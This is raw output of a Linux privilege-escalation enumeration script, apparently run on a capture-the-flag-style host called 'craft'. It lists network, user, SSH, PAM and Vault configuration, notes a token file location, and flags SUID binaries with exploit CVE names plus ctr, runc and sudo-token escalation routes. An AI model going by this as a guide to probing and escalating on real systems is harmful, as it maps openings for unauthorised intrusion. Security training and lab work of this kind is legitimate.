TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
veth5687e2b: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet6 fe80::e0cf:5bff:fe05:5856 prefixlen 64 scopeid 0x20<link>
ether [Link] txqueuelen 0 (Ethernet)
RX packets 392203 bytes 44953860 (42.8 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 417608 bytes 60199950 (57.4 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
veth7e96868: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet6 fe80::ec27:72ff:fe11:ba41 prefixlen 64 scopeid 0x20<link>
ether [Link] txqueuelen 0 (Ethernet)
RX packets 1079 bytes 69066 (67.4 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 402 bytes 40037 (39.0 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
veth7e1df0c: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet6 fe80::38c4:c1ff:fe7d:365 prefixlen 64 scopeid 0x20<link>
ether [Link] txqueuelen 0 (Ethernet)
RX packets 194 bytes 40018 (39.0 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 1027 bytes 61192 (59.7 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
vethaf27d62: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet6 fe80::5444:4eff:fe20:6f4c prefixlen 64 scopeid 0x20<link>
ether [Link] txqueuelen 0 (Ethernet)
RX packets 1947 bytes 937460 (915.4 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 2402 bytes 1305250 (1.2 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
vethdc12f9f: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet6 fe80::a07f:f8ff:fef4:9d78 prefixlen 64 scopeid 0x20<link>
ether [Link] txqueuelen 0 (Ethernet)
RX packets 672870 bytes 116529990 (111.1 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 695704 bytes 137466647 (131.0 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
vethe4fc99f: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet6 fe80::8c19:7cff:fede:598f prefixlen 64 scopeid 0x20<link>
ether [Link] txqueuelen 0 (Ethernet)
RX packets 1444 bytes 1238229 (1.1 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 2613 bytes 314177 (306.8 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
╔══════════╣ Hostname, hosts and DNS
══╣ Hostname Information
System hostname: [Link]
FQDN: craft
══╣ Hosts File Information
Contents of /etc/hosts:
[Link] localhost
[Link] craft [Link] [Link] [Link]
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
[Link] [Link]
══╣ DNS Configuration
DNS Servers ([Link]):
[Link]
[Link]
Systemd-resolved configuration:
[Resolve]
DNS Domain Information:
(none)
DNS Cache Status (systemd-resolve):
DNS Servers: [Link]
[Link]
DNSSEC NTA: [Link]
[Link]
[Link]
[Link]
╔══════════╣ Active Ports
╚ [Link]
[Link]#open-ports
══╣ Active Ports (netstat)
tcp 0 0 [Link]:5355 [Link]:* LISTEN -
tcp 0 0 [Link]:22 [Link]:* LISTEN -
tcp6 0 0 :::443 :::* LISTEN -
tcp6 0 0 :::5355 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -
tcp6 0 0 :::6022 :::* LISTEN -
╔══════════╣ Network Traffic Analysis Capabilities
══╣ Available Sniffing Tools
No sniffing tools found
══╣ Network Interfaces Sniffing Capabilities
Interface eth0: Not sniffable
Interface br-6d19c883b122: Not sniffable
Interface docker0: Not sniffable
Interface br-2126e7722b3e: Not sniffable
Interface br-26e562541429: Not sniffable
Interface veth5687e2b@if7: Not sniffable
Interface veth7e1df0c@if9: Not sniffable
Interface vethe4fc99f@if11: Not sniffable
Interface vethaf27d62@if13: Not sniffable
Interface veth7e96868@if15: Not sniffable
Interface vethdc12f9f@if17: Not sniffable
No sniffable interfaces found
╔══════════╣ Firewall Rules Analysis
══╣ Iptables Rules
No permission to list iptables rules
══╣ Nftables Rules
nftables Not Found
══╣ Firewalld Rules
firewalld Not Found
══╣ UFW Rules
ufw Not Found
╔══════════╣ Inetd/Xinetd Services Analysis
══╣ Inetd Services
inetd Not Found
══╣ Xinetd Services
xinetd Not Found
══╣ Running Inetd/Xinetd Services
Active Services (from netstat):
Active Services (from ss):
Running Service Processes:
╔══════════╣ Internet Access?
Port 80 is not accessible
DNS is not accessible
Port 443 is not accessible
ICMP is not accessible
Port 443 is not accessible with curl
╔═══════════════════╗
═══════════════════════════════╣ Users Information ╠═══════════════════════════════
╚═══════════════════╝
╔══════════╣ My user
╚ [Link]
[Link]#users
uid=1001(gilfoyle) gid=1001(gilfoyle) groups=1001(gilfoyle)
╔══════════╣ PGP Keys and Related Files
╚ [Link]
[Link]#pgp-keys
GPG:
GPG is installed, listing keys:
NetPGP:
netpgpkeys Not Found
PGP Related Files:
Found: /home/gilfoyle/.gnupg
total 20
drwx------ 3 gilfoyle gilfoyle 4096 Nov 30 08:14 .
drwx------ 5 gilfoyle gilfoyle 4096 Nov 30 08:14 ..
drwx------ 2 gilfoyle gilfoyle 4096 Nov 30 08:14 private-keys-v1.d
-rw------- 1 gilfoyle gilfoyle 32 Nov 30 08:14 [Link]
-rw------- 1 gilfoyle gilfoyle 1200 Nov 30 08:14 [Link]
╔══════════╣ Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d
╚ [Link]
[Link]#sudo-and-suid
╔══════════╣ Checking sudo tokens
╚ [Link]
[Link]#reusing-sudo-tokens
ptrace protection is disabled (0), so sudo tokens could be abused
[Link] Not Found
╔══════════╣ Checking Pkexec and Polkit
╚ [Link]
groups-linux-pe/[Link]#pe---method-2
══╣ Polkit Binary
Pkexec binary found at: /usr/bin/pkexec
Pkexec binary has SUID bit set!
-rwsr-xr-x 1 root root 23360 Jan 13 2022 /usr/bin/pkexec
pkexec version 0.105
══╣ Polkit Policies
Checking /etc/polkit-1/[Link].d/:
[Configuration]
AdminIdentities=unix-user:0
[Configuration]
AdminIdentities=unix-group:sudo
Checking /usr/share/polkit-1/rules.d/:
[Link](function(action, subject) {
if (([Link] == "[Link]-system" ||
[Link] == "[Link]-offline-update") &&
[Link] == true && [Link] == true &&
[Link]("sudo")) {
return [Link];
}
});
══╣ Polkit Authentication Agent
╔══════════╣ Superusers and UID 0 Users
╚ [Link]
groups-linux-pe/[Link]
══╣ Users with UID 0 in /etc/passwd
root:x:0:0:root:/root:/bin/bash
══╣ Users with sudo privileges in sudoers
╔══════════╣ Users with console
gilfoyle:x:1001:1001::/home/gilfoyle:/bin/bash
root:x:0:0:root:/root:/bin/bash
╔══════════╣ All users & groups
uid=0(root) gid=0(root) groups=0(root)
uid=1001(gilfoyle) gid=1001(gilfoyle) groups=1001(gilfoyle)
uid=100(systemd-timesync) gid=102(systemd-timesync) groups=102(systemd-timesync)
uid=101(systemd-network) gid=103(systemd-network) groups=103(systemd-network)
uid=102(systemd-resolve) gid=104(systemd-resolve) groups=104(systemd-resolve)
uid=103(systemd-bus-proxy) gid=105(systemd-bus-proxy) groups=105(systemd-bus-proxy)
uid=104(_apt) gid=65534(nogroup) groups=65534(nogroup)
uid=105(messagebus) gid=109(messagebus) groups=109(messagebus)
uid=106(sshd) gid=65534(nogroup) groups=65534(nogroup)
uid=10(uucp) gid=10(uucp) groups=10(uucp)
uid=13(proxy) gid=13(proxy) groups=13(proxy)
uid=1(daemon) gid=1(daemon) groups=1(daemon)
uid=2(bin) gid=2(bin) groups=2(bin)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=34(backup) gid=34(backup) groups=34(backup)
uid=38(list) gid=38(list) groups=38(list)
uid=39(irc) gid=39(irc) groups=39(irc)
uid=3(sys) gid=3(sys) groups=3(sys)
uid=41(gnats) gid=41(gnats) groups=41(gnats)
uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
uid=5(games) gid=60(games) groups=60(games)
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
uid=6(man) gid=12(man) groups=12(man)
uid=7(lp) gid=7(lp) groups=7(lp)
uid=8(mail) gid=8(mail) groups=8(mail)
uid=9(news) gid=9(news) groups=9(news)
╔══════════╣ Currently Logged in Users
══╣ Basic user information
[Link] up 3:01, 1 user, load average: 0.73, 0.26, 0.09
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
gilfoyle pts/0 [Link] 08:06 45.00s 0.59s 0.00s /bin/sh ./[Link]
══╣ Active sessions
[Link] up 3:01, 1 user, load average: 0.73, 0.26, 0.09
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
gilfoyle pts/0 [Link] 08:06 45.00s 0.59s 0.00s w
══╣ Logged in users (utmp)
system boot 2025-11-30 05:13
run-level 5 2025-11-30 05:13
LOGIN tty1 2025-11-30 05:13 629 id=tty1
gilfoyle - pts/0 2025-11-30 08:06 . 20968 ([Link])
══╣ SSH sessions
ESTAB 0 7976 [Link]:22 [Link]:60846
══╣ Screen sessions
══╣ Tmux sessions
╔══════════╣ Last Logons and Login History
══╣ Last logins
gilfoyle pts/0 [Link] Sun Nov 30 08:06 still logged in
wtmp begins Sun Nov 30 [Link] 2025
══╣ Failed login attempts
══╣ Recent logins from [Link] (limit 20)
══╣ Last time logon each user
Username Port From Latest
root tty1 Thu Nov 16 [Link] -0500 2023
gilfoyle pts/0 [Link] Sun Nov 30 [Link] -0500 2025
╔══════════╣ Do not forget to test 'su' as any other user with shell: without password and with their names as password (I don't do it in FAST mode...)
╔══════════╣ Do not forget to execute 'sudo -l' without password or with valid password (if you know it)!!
╔══════════════════════╗
═════════════════════════════╣ Software Information ╠═════════════════════════════
╚══════════════════════╝
╔══════════╣ Useful software
/usr/bin/base64
/usr/bin/ctr
/usr/bin/curl
/usr/bin/docker
/usr/bin/make
/usr/bin/perl
/bin/ping
/usr/bin/python
/usr/bin/python2
/usr/bin/python2.7
/usr/bin/python3
/usr/bin/runc
/usr/bin/wget
╔══════════╣ Installed Compilers
ii gcc-6 6.3.0-18+deb9u1 amd64 GNU C compiler
ii linux-compiler-gcc-6-x86 4.9.320-2 amd64 Compiler for Linux on x86 (meta-package)
╔══════════╣ Checking if containerd(ctr) is available
╚ [Link]
[Link]#containerd-ctr-privilege-escalation
ctr was found in /usr/bin/ctr, you may be able to escalate privileges with it
ctr: failed to dial "/run/containerd/[Link]": connection error: desc = "transport: error while dialing: dial unix /run/containerd/[Link]: connect: permission denied"
╔══════════╣ Searching docker files (limit 70)
╚ [Link]
security/[Link]#docker-breakout--privilege-escalation
lrwxrwxrwx 1 root root 33 Feb 2 2019 /etc/systemd/system/[Link]/[Link] -> /lib/systemd/system/[Link]
-rw-r--r-- 1 root root 0 Feb 2 2019 /var/lib/systemd/deb-systemd-helper-enabled/[Link]/[Link]
╔══════════╣ Analyzing MariaDB Files (limit 70)
-rw-r--r-- 1 root root 869 Aug 10 2017 /etc/mysql/[Link]
[client-server]
!includedir /etc/mysql/conf.d/
!includedir /etc/mysql/[Link].d/
╔══════════╣ Analyzing Rsync Files (limit 70)
-rw-r--r-- 1 root root 1044 Dec 10 2017 /usr/share/doc/rsync/examples/[Link]
[ftp]
comment = public archive
path = /var/www/pub
use chroot = yes
lock file = /var/lock/rsyncd
read only = yes
list = yes
uid = nobody
gid = nogroup
strict modes = yes
ignore errors = no
ignore nonreadable = yes
transfer logging = no
timeout = 600
refuse options = checksum dry-run
dont compress = *.gz *.tgz *.zip *.z *.rpm *.deb *.iso *.bz2 *.tbz
╔══════════╣ Analyzing PAM Auth Files (limit 70)
drwxr-xr-x 2 root root 4096 Nov 16 2023 /etc/pam.d
-rw-r--r-- 1 root root 2388 Feb 9 2019 /etc/pam.d/sshd
auth requisite pam_exec.so quiet expose_authtok log=/var/log/[Link] /usr/local/bin/vault-ssh-helper -config=/usr/local/etc/[Link]
auth optional pam_unix.so not_set_pass use_first_pass nodelay
account required pam_nologin.so
session [success=ok ignore=ignore module_unknown=ignore default=bad] pam_selinux.so close
session required pam_loginuid.so
session optional pam_keyinit.so force revoke
session optional pam_motd.so motd=/run/[Link]
session optional pam_motd.so noupdate
session optional pam_mail.so standard noenv # [1]
session required pam_limits.so
session required pam_env.so # [1]
session required pam_env.so user_readenv=1 envfile=/etc/default/locale
session [success=ok ignore=ignore module_unknown=ignore default=bad] pam_selinux.so open
╔══════════╣ Analyzing Ldap Files (limit 70)
The password hash is from the {SSHA} to 'structural'
drwxr-xr-x 2 root root 4096 Nov 16 2023 /etc/ldap
╔══════════╣ Analyzing Keyring Files (limit 70)
drwxr-xr-x 3 root root 4096 Nov 22 2018 /usr/lib/python2.7/dist-packages/keyrings
drwxr-xr-x 3 root root 4096 Nov 22 2018 /usr/lib/python3/dist-packages/keyrings
drwxr-xr-x 2 root root 4096 Nov 16 2023 /usr/share/keyrings
╔══════════╣ Analyzing Cache Vi Files (limit 70)
-rw------- 1 gilfoyle gilfoyle 2546 Feb 9 2019 /home/gilfoyle/.viminfo
╔══════════╣ Analyzing Postfix Files (limit 70)
-rw-r--r-- 1 root root 694 Apr 12 2016 /usr/share/bash-completion/completions/postfix
╔══════════╣ Analyzing Other Interesting Files (limit 70)
-rw-r--r-- 1 root root 3526 May 15 2017 /etc/skel/.bashrc
-rw-r--r-- 1 gilfoyle gilfoyle 634 Feb 9 2019 /home/gilfoyle/.bashrc
-rw-r--r-- 1 root root 675 May 15 2017 /etc/skel/.profile
-rw-r--r-- 1 gilfoyle gilfoyle 148 Feb 8 2019 /home/gilfoyle/.profile
╔══════════╣ Searching mysql credentials and exec
Unable to determine MySQL version.
╔══════════╣ Analyzing PGP-GPG Files (limit 70)
/usr/bin/gpg
netpgpkeys Not Found
netpgp Not Found
-rw-r--r-- 1 root root 2760 Feb 2 2019 /etc/apt/[Link]
-rw-r--r-- 1 root root 8748 Mar 13 2022 /etc/apt/[Link].d/debian-archive-[Link]
-rw-r--r-- 1 root root 8757 Mar 13 2022 /etc/apt/[Link].d/debian-archive-[Link]
-rw-r--r-- 1 root root 2469 Mar 13 2022 /etc/apt/[Link].d/debian-archive-[Link]
-rw-r--r-- 1 root root 8176 Mar 13 2022 /etc/apt/[Link].d/debian-archive-[Link]
-rw-r--r-- 1 root root 8185 Mar 13 2022 /etc/apt/[Link].d/debian-archive-[Link]
-rw-r--r-- 1 root root 2344 Mar 13 2022 /etc/apt/[Link].d/debian-archive-[Link]
-rw-r--r-- 1 root root 5138 May 25 2017 /etc/apt/[Link].d/debian-archive-[Link]
-rw-r--r-- 1 root root 5147 May 25 2017 /etc/apt/[Link].d/debian-archive-[Link]
-rw-r--r-- 1 root root 2775 May 25 2017 /etc/apt/[Link].d/debian-archive-[Link]
-rw-r--r-- 1 root root 7483 May 25 2017 /etc/apt/[Link].d/debian-archive-[Link]
-rw-r--r-- 1 root root 7492 May 25 2017 /etc/apt/[Link].d/debian-archive-[Link]
-rw-r--r-- 1 root root 2275 May 25 2017 /etc/apt/[Link].d/debian-archive-[Link]
-rw------- 1 gilfoyle gilfoyle 1200 Nov 30 08:14 /home/gilfoyle/.gnupg/[Link]
-rw-r--r-- 1 root root 3452 Oct 5 2018 /usr/share/gnupg/[Link]
-rw-r--r-- 1 root root 68989 Mar 13 2022 /usr/share/keyrings/debian-archive-[Link]
-rw-r--r-- 1 root root 24169 Mar 13 2022 /usr/share/keyrings/debian-archive-[Link]
drwx------ 3 gilfoyle gilfoyle 4096 Nov 30 08:14 /home/gilfoyle/.gnupg
╔══════════╣ Checking if runc is available
╚ [Link]
[Link]#runc--privilege-escalation
runc was found in /usr/bin/runc, you may be able to escalate privileges with it
╔══════════╣ Searching uncommon passwd files (splunk)
passwd file: /etc/pam.d/passwd
passwd file: /etc/passwd
passwd file: /usr/share/bash-completion/completions/passwd
passwd file: /usr/share/lintian/overrides/passwd
╔══════════╣ Searching ssl/ssh files
╔══════════╣ Analyzing SSH Files (limit 70)
-rw-r--r-- 1 gilfoyle gilfoyle 666 Jul 20 2020 /home/gilfoyle/.ssh/known_hosts
-rw-r--r-- 1 gilfoyle gilfoyle 401 Feb 9 2019 /home/gilfoyle/.ssh/authorized_keys
-rw-r--r-- 1 root root 173 Nov 22 2018 /etc/ssh/ssh_host_ecdsa_key.pub
-rw-r--r-- 1 root root 93 Nov 22 2018 /etc/ssh/ssh_host_ed25519_key.pub
-rw-r--r-- 1 root root 393 Nov 22 2018 /etc/ssh/ssh_host_rsa_key.pub
PermitRootLogin yes
PasswordAuthentication no
PermitEmptyPasswords no
ChallengeResponseAuthentication yes
UsePAM yes
══╣ Some certificates were found (out limited):
/etc/ssl/certs/[Link]
/etc/ssl/certs/AC_RAIZ_FNMT-[Link]
/etc/ssl/certs/Actalis_Authentication_Root_CA.pem
/etc/ssl/certs/AffirmTrust_Commercial.pem
/etc/ssl/certs/AffirmTrust_Networking.pem
/etc/ssl/certs/AffirmTrust_Premium_ECC.pem
/etc/ssl/certs/AffirmTrust_Premium.pem
/etc/ssl/certs/Amazon_Root_CA_1.pem
/etc/ssl/certs/Amazon_Root_CA_2.pem
/etc/ssl/certs/Amazon_Root_CA_3.pem
/etc/ssl/certs/Amazon_Root_CA_4.pem
/etc/ssl/certs/Atos_TrustedRoot_2011.pem
/etc/ssl/certs/Autoridad_de_Certificacion_Firmaprofesional_CIF_A62634068.pem
/etc/ssl/certs/Baltimore_CyberTrust_Root.pem
/etc/ssl/certs/Buypass_Class_2_Root_CA.pem
/etc/ssl/certs/Buypass_Class_3_Root_CA.pem
/etc/ssl/certs/[Link]
/etc/ssl/certs/CA_Disig_Root_R2.pem
/etc/ssl/certs/[Link]
/etc/ssl/certs/Certigna_Root_CA.pem
══╣ Some home ssh config file was found
/usr/share/openssh/sshd_config
ChallengeResponseAuthentication no
UsePAM yes
X11Forwarding yes
PrintMotd no
AcceptEnv LANG LC_*
Subsystem sftp /usr/lib/openssh/sftp-server
══╣ /etc/[Link] file found, trying to read the rules:
/etc/[Link]
Searching inside /etc/ssh/ssh_config for interesting info
Host *
SendEnv LANG LC_*
HashKnownHosts yes
GSSAPIAuthentication yes
╔══════════╣ Searching Vault-ssh files
/usr/local/etc/[Link]
vault_addr = "[Link]
ssh_mount_point = "ssh"
tls_skip_verify = true
allowed_roles = "*"
Path Type Accessor Description
---- ---- -------- -----------
cubbyhole/ cubbyhole cubbyhole_ffc9a6e5 per-token private secret storage
identity/ identity identity_56533c34 identity store
secret/ kv kv_2d9b0109 key/value secret storage
ssh/ ssh ssh_3bbd5276 n/a
sys/ system system_477ec595 system endpoints used for control, policy and debugging
/home/gilfoyle/.vault-token
╔════════════════════════════════════╗
══════════════════════╣ Files with Interesting Permissions ╠══════════════════════
╚════════════════════════════════════╝
╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ [Link]
[Link]#sudo-and-suid
-rwsr-xr-x 1 root root 31K Aug 21 2018 /bin/fusermount
-rwsr-xr-x 1 root root 60K Nov 10 2016 /bin/ping
-rwsr-xr-x 1 root root 44K Mar 7 2018 /bin/mount ---> Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-xr-x 1 root root 40K Mar 17 2021 /bin/su
-rwsr-xr-x 1 root root 31K Mar 7 2018 /bin/umount ---> BSD/Linux(08-1996)
-rwsr-xr-x 1 root root 40K Mar 17 2021 /usr/bin/newgrp ---> HP-UX_10.20
-rwsr-xr-x 1 root root 75K Mar 17 2021 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 40K Mar 17 2021 /usr/bin/chsh
-rwsr-xr-x 1 root root 23K Jan 13 2022 /usr/bin/pkexec ---> Linux4.10_to_5.1.17(CVE-2019-13272)/rhel_6(CVE-2011-1485)/Generic_CVE-2021-4034
-rwsr-xr-x 1 root root 49K Mar 17 2021 /usr/bin/chfn ---> SuSE_9.3/10
-rwsr-xr-x 1 root root 59K Mar 17 2021 /usr/bin/passwd ---> Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
-rwsr-xr-x 1 root root 10K Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 15K Jan 13 2022 /usr/lib/policykit-1/polkit-agent-helper-1
-r-sr-xr-x 1 root root 9.4K Nov 5 2020 /usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
-r-sr-xr-x 1 root root 14K Nov 5 2020 /usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
-rwsr-xr-- 1 root messagebus 42K Jun 9 2019 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 431K Mar 1 2019 /usr/lib/openssh/ssh-keysign
╔══════════╣ SGID
╚ [Link]
[Link]#sudo-and-suid
-rwxr-sr-x 1 root shadow 35K May 27 2017 /sbin/unix_chkpwd
-rwxr-sr-x 1 root mail 19K Jan 17 2017 /usr/bin/dotlockfile
-rwxr-sr-x 1 root tty 15K Apr 12 2017 /usr/bin/bsd-write
-rwxr-sr-x 1 root shadow 23K Mar 17 2021 /usr/bin/expiry
-rwxr-sr-x 1 root shadow 71K Mar 17 2021 /usr/bin/chage
-rwxr-sr-x 1 root tty 27K Mar 7 2018 /usr/bin/wall
-rwxr-sr-x 1 root ssh 351K Mar 1 2019 /usr/bin/ssh-agent
-rwxr-sr-x 1 root crontab 40K Oct 29 2021 /usr/bin/crontab
╔══════════╣ Files with ACLs (limited to 50)
╚ [Link]
[Link]#acls
files with acls in searched folders Not Found
╔══════════╣ Capabilities
╚ [Link]
[Link]#capabilities
══╣ Current shell capabilities
./[Link]: 7794: ./[Link]: [[: not found
CapInh: [Invalid capability format]
./[Link]: 7794: ./[Link]: [[: not found
CapPrm: [Invalid capability format]
./[Link]: 7785: ./[Link]: [[: not found
CapEff: [Invalid capability format]
./[Link]: 7794: ./[Link]: [[: not found
CapBnd: [Invalid capability format]
./[Link]: 7794: ./[Link]: [[: not found
CapAmb: [Invalid capability format]
╚ Parent process capabilities
./[Link]: 7819: ./[Link]: [[: not found
CapInh: [Invalid capability format]
./[Link]: 7819: ./[Link]: [[: not found
CapPrm: [Invalid capability format]
./[Link]: 7810: ./[Link]: [[: not found
CapEff: [Invalid capability format]
./[Link]: 7819: ./[Link]: [[: not found
CapBnd: [Invalid capability format]
./[Link]: 7819: ./[Link]: [[: not found
CapAmb: [Invalid capability format]
Files with capabilities (limited to 50):
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
╔══════════╣ Users with capabilities
╚ [Link]
[Link]#capabilities
╔══════════╣ Checking misconfigurations of [Link]
╚ [Link]
[Link]#ldso
/etc/[Link]
Content of /etc/[Link]:
include /etc/[Link].d/*.conf
/etc/[Link].d
/etc/[Link].d/fakeroot-x86_64-[Link]
- /usr/lib/x86_64-linux-gnu/libfakeroot
/etc/[Link].d/[Link]
- /usr/local/lib
/etc/[Link].d/x86_64-[Link]
- /lib/x86_64-linux-gnu
- /usr/lib/x86_64-linux-gnu
/etc/[Link]
╔══════════╣ Files (scripts) in /etc/profile.d/
╚ [Link]
[Link]#profiles-files
total 12
drwxr-xr-x 2 root root 4096 Nov 22 2018 .
drwxr-xr-x 80 root root 4096 Nov 30 08:15 ..
-rw-r--r-- 1 root root 663 Apr 12 2016 bash_completion.sh
╔══════════╣ Permissions in init, init.d, systemd, and rc.d
╚ [Link]
[Link]#init-initd-systemd-and-rcd
═╣ Hashes inside passwd file? ........... No
═╣ Writable passwd file? ................ No
═╣ Credentials in fstab/mtab? ........... No
═╣ Can I read shadow files? ............. No
═╣ Can I read shadow plists? ............ No
═╣ Can I write shadow plists? ........... No
═╣ Can I read opasswd file? ............. No
═╣ Can I write in network-scripts? ...... No
═╣ Can I read root folder? .............. No
╔══════════╣ Searching root files in home dirs (limit 30)
/home/
/root/
╔══════════╣ Searching folders owned by me containing others files on it (limit 100)
╔══════════╣ Readable files belonging to root and readable by me but not world readable
╔══════════╣ Interesting writable files owned by me or writable by everyone (not in Home) (max 200)
╚ [Link]
[Link]#writable-files
/dev/mqueue
/dev/shm
/home/gilfoyle
/run/lock
/run/user/1001
/run/user/1001/gnupg
/run/user/1001/systemd
/run/user/1001/systemd/transient
/tmp
/tmp/.font-unix
/tmp/.ICE-unix
/tmp/.Test-unix
/tmp/.X11-unix
/tmp/.XIM-unix
/var/tmp
╔══════════╣ Interesting GROUP writable files (not in Home) (max 200)
╚ [Link]
[Link]#writable-files
╔═════════════════════════╗
════════════════════════════╣ Other Interesting Files ╠════════════════════════════
╚═════════════════════════╝
╔══════════╣ .sh files in path
╚ [Link]
[Link]#scriptbinaries-in-path
/usr/bin/[Link]
╔══════════╣ Executable files potentially added by user (limit 70)
2020-11-05+[Link].1422452910 /etc/vmware-tools/[Link]-old
2020-11-05+[Link].0462454800 /usr/lib/vmware-tools/plugins32/vmsvc/[Link]
2020-11-05+[Link].0462454800 /usr/lib/vmware-tools/plugins32/vmsvc/[Link]
2020-11-05+[Link].0422454880 /usr/lib/vmware-tools/plugins32/vmusr/[Link]
2020-11-05+[Link].0422454880 /usr/lib/vmware-tools/plugins32/vmusr/[Link]
2020-11-05+[Link].0422454880 /usr/lib/vmware-tools/plugins32/vmusr/[Link]
2020-11-05+[Link].0422454880 /usr/lib/vmware-tools/plugins32/vmsvc/[Link]
2020-11-05+[Link].0422454880 /usr/lib/vmware-tools/plugins32/vmsvc/[Link]
2020-11-05+[Link].0422454880 /usr/lib/vmware-tools/plugins32/vmsvc/[Link]
2020-11-05+[Link].0422454880 /usr/lib/vmware-tools/plugins32/vmsvc/[Link]
2020-11-05+[Link].0422454880 /usr/lib/vmware-tools/plugins32/common/[Link]
2020-11-05+[Link].0422454880 /usr/lib/vmware-tools/plugins32/common/[Link]
2020-11-05+[Link].0382454970 /usr/lib/vmware-tools/configurator/XOrg/7.6_64/vmmouse_detect
2020-11-05+[Link].0342455040 /usr/lib/vmware-tools/configurator/XOrg/7.6/vmmouse_detect
2020-11-05+[Link].0182455360 /usr/lib/vmware-tools/sbin64/vmware-rpctool
2020-11-05+[Link].0182455360 /usr/lib/vmware-tools/sbin64/vmware-hgfsmounter
2020-11-05+[Link].0182455360 /usr/lib/vmware-tools/sbin64/vmware-checkvm
2020-11-05+[Link].0182455360 /usr/lib/vmware-tools/plugins64/vmusr/[Link]
2020-11-05+[Link].0182455360 /usr/lib/vmware-tools/plugins64/vmsvc/[Link]
2020-11-05+[Link].0182455360 /usr/lib/vmware-tools/plugins64/vmsvc/[Link]
2020-11-05+[Link].0182455360 /usr/lib/vmware-tools/plugins64/vmsvc/[Link]
2020-11-05+[Link].0182455360 /usr/lib/vmware-tools/plugins64/vmsvc/[Link]
2020-11-05+[Link].0182455360 /usr/lib/vmware-tools/plugins64/vmsvc/[Link]
2020-11-05+[Link].0182455360 /usr/lib/vmware-tools/plugins64/vmsvc/[Link]
2020-11-05+[Link].0182455360 /usr/lib/vmware-tools/plugins64/common/[Link]
2020-11-05+[Link].0182455360 /usr/lib/vmware-tools/plugins64/common/[Link]
2020-11-05+[Link].0142455450 /usr/lib/vmware-tools/plugins64/vmusr/[Link]
2020-11-05+[Link].0142455450 /usr/lib/vmware-tools/plugins64/vmusr/[Link]
2020-11-05+[Link].0142455450 /usr/lib/vmware-tools/bin64/vmware-xferlogs
2020-11-05+[Link].0142455450 /usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
2020-11-05+[Link].0142455450 /usr/lib/vmware-tools/bin64/[Link]
2020-11-05+[Link].0142455450 /usr/lib/vmware-tools/bin64/appLoader-av0
2020-11-05+[Link].0142455450 /usr/lib/vmware-tools/bin64/appLoader
2020-11-05+[Link].0142455450 /usr/lib/vmware-tools/bin32/vmware-xferlogs
2020-11-05+[Link].0142455450 /usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
2020-11-05+[Link].0102455520 /usr/lib/vmware-tools/bin32/[Link]
2020-11-05+[Link].0102455520 /usr/lib/vmware-tools/bin32/appLoader-av0
2020-11-05+[Link].0102455520 /usr/lib/vmware-tools/bin32/appLoader
2020-11-05+[Link].5142465480 /usr/lib/vmware-tools/sbin32/vmware-rpctool
2020-11-05+[Link].5142465480 /usr/lib/vmware-tools/sbin32/vmware-hgfsmounter
2020-11-05+[Link].5142465480 /usr/lib/vmware-tools/sbin32/vmware-checkvm
2020-11-05+[Link].4622507320 /etc/init.d/vmware-tools
2020-11-05+[Link].1702577160 /usr/bin/[Link]
2020-11-05+[Link].1702577160 /usr/bin/vm-support
2020-11-05+[Link].1662577250 /usr/bin/[Link]
2020-11-05+[Link].1582577420 /etc/vmware-tools/[Link]
2020-11-05+[Link].1582577420 /etc/vmware-tools/[Link]-old
2020-11-05+[Link].1582577420 /etc/vmware-tools/scripts/vmware/[Link]-old
2020-11-05+[Link].1582577420 /etc/vmware-tools/[Link]-old
2020-11-05+[Link].1582577420 /etc/vmware-tools/[Link]-old
2020-11-05+[Link].1582577420 /etc/vmware-tools/[Link]-old
2020-11-05+[Link].1582577420 /etc/vmware-tools/messages/ja/[Link]
2020-11-05+[Link].1582577420 /etc/vmware-tools/messages/ja/[Link]
2020-11-05+[Link].1582577420 /etc/vmware-tools/messages/ja/[Link]
2020-11-05+[Link].1582577420 /etc/vmware-tools/messages/ja/[Link]
2020-11-05+[Link].1582577420 /etc/vmware-tools/messages/ja/[Link]
